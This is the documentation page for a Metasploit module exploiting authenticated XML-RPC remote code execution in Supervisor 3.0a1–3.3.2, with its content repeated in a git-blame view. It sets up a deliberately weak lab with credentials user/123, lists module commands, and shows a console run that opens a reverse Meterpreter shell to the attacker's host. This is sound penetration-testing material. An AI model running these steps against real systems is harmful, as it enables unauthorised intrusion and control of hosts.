documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md

## Vulnerable Application

  This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
  
  This has been tested with versions 3.2.0 and 3.3.2

### Creating A Testing Environment

  At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.

  1. ```sudo apt-get install supervisor```
  2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`

    ```
    [inet_http_server]         ; inet (TCP) server disabled by default
    port=:9001        ; ip_address:port specifier, *:port for all iface
    username=user              ; default is no username (open server)
    password=123               ; default is no password (open server)
    ```

  3. Restart the service: `sudo service supervisor restart`

## Verification Steps

  1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```set httpusername user```
  5. ```set httppassword 123```
  6. ```exploit```
  7. A meterpreter session should have been opened successfully

## Options

  **HttpUsername**

  Username for HTTP basic auth which is set in the conf file(optional)

  **HttpPassword**

  Password for HTTP basic auth which is set in the conf file(optional)

  **TARGETURI**

  The path to the XML-RPC endpoint

## Scenarios

### Supervisor 3.2.0 on Xubuntu 16.04

```
msf > use exploit/linux/http/supervisor_xmlrpc_exec 
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check 

[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100

meterpreter > 
```
Add documentation for module 2017-08-30 01:28:19 +01:00			`## Vulnerable Application`

			`This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2`

			`This has been tested with versions 3.2.0 and 3.3.2`

cleaned up version, and docs 2017-09-23 10:51:52 -04:00			`### Creating A Testing Environment`

			`At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.`

			1. ```sudo apt-get install supervisor```
			2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`

			```
			`[inet_http_server] ; inet (TCP) server disabled by default`
			`port=:9001 ; ip_address:port specifier, *:port for all iface`
			`username=user ; default is no username (open server)`
			`password=123 ; default is no password (open server)`
			```

			3. Restart the service: `sudo service supervisor restart`

Add documentation for module 2017-08-30 01:28:19 +01:00			`## Verification Steps`

cleaned up version, and docs 2017-09-23 10:51:52 -04:00			1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
			2. ```set lhost [IP]```
			3. ```set rhost [IP]```
			4. ```set httpusername user```
			5. ```set httppassword 123```
			6. ```exploit```
Add documentation for module 2017-08-30 01:28:19 +01:00			`7. A meterpreter session should have been opened successfully`

			`## Options`

cleaned up version, and docs 2017-09-23 10:51:52 -04:00			`HttpUsername`

			`Username for HTTP basic auth which is set in the conf file(optional)`

			`HttpPassword`

			`Password for HTTP basic auth which is set in the conf file(optional)`

			`TARGETURI`

			`The path to the XML-RPC endpoint`
Add documentation for module 2017-08-30 01:28:19 +01:00
			`## Scenarios`

cleaned up version, and docs 2017-09-23 10:51:52 -04:00			`### Supervisor 3.2.0 on Xubuntu 16.04`

			```
Add documentation for module 2017-08-30 01:28:19 +01:00			`msf > use exploit/linux/http/supervisor_xmlrpc_exec`
			`msf exploit(supervisor_xmlrpc_exec) > set httpusername user`
			`httpusername => user`
			`msf exploit(supervisor_xmlrpc_exec) > set httppassword 123`
			`httppassword => 123`
			`msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2`
			`lhost => 192.168.0.2`
			`msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19`
			`rhost => 192.168.0.19`
			`msf exploit(supervisor_xmlrpc_exec) > check`

			`[*] Extracting version from web interface..`
			`[*] Using basic auth (user:123)`
			`[+] Vulnerable version found: 3.2.0`
			`[*] 192.168.0.19:9001 The target appears to be vulnerable.`
			`msf exploit(supervisor_xmlrpc_exec) > exploit`

			`[*] Started reverse TCP handler on 192.168.0.2:4444`
			`[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2`
			`[*] Using basic auth (user:123)`
			`[*] Sending stage (2878872 bytes) to 192.168.0.19`
			`[*] Command Stager progress - 100.00% done (782/782 bytes)`
			`[+] Request timeout, usually indicates success. Passing to handler..`
			`[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100`

			`meterpreter >`
cleaned up version, and docs 2017-09-23 10:51:52 -04:00			```